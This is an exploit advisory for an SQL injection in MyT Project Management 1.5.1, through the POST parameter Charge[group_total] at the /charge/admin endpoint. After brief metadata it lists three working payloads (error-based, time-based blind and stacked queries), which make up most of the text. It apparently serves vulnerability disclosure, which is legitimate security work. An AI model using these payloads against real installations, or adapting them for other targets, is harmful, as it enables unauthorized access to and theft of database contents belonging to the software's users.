MyT Project Management 1.5.1 SQL Injection

`# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection  
# Date: 03.01.2019  
# Exploit Author: Mehmet Ander Key  
# Vendor Homepage: https://manageyourteam.net/  
# Software Link: https://sourceforge.net/projects/myt/  
# Version: v1.5.1  
# Category: Webapps  
# Tested on: WAMPP @Win  
# Software description:  
MyT (Manage Your Team) - is a free open source task management and project  
management system, based on Yii Framework, easy to use and with a great  
perspective of growth for the future.  
  
# Vulnerabilities:  
# An attacker can access all data following an un/authorized user login  
using the parameter.  
  
# POC - SQL Injection :  
  
# Parameter: Charge[group_total](POST)  
# Request URL: /charge/admin  
  
# Type : Error Based  
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND  
EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT  
(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid  
  
# Type : Time-Based Blind  
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM  
(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid  
  
# Type : Stacked Queries  
# Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT  
SLEEP(5)#&Charge_page=1&ajax=charge-grid  
  
`